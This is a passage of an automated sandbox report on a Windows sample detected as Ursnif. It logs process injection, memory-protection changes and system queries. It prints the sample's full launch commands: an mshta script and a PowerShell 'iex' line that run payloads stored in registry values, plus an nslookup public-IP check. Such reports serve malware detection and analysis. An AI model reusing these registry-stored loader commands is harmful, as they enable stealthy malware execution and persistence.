                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
                      Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 9D0000
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9FA000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2B60000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9FC000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 30F0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD217F000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 660000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 2D2D64A0000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
                      Changes memory attributes in foreign processes to executable or writableShow sources
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9FA000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 2B60000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: 40
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9FC000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 30F0000 value: 80
                      Modifies the context of a thread in another process (thread injection)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4868
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424
                      Source: C:\Windows\explorer.exeThread register set: target process: 3656
                      Source: C:\Windows\explorer.exeThread register set: target process: 4268
                      Source: C:\Windows\explorer.exeThread register set: target process: 4772
                      Source: C:\Windows\explorer.exeThread register set: target process: 6752
                      Source: C:\Windows\explorer.exeThread register set: target process: 5288
                      Source: C:\Windows\explorer.exeThread register set: target process: 1260
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3424
                      Source: C:\Windows\System32\control.exeThread register set: target process: 6508
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: explorer.exe, 0000001C.00000000.922381772.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.884577351.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD2E33 cpuid
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457D8BC CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
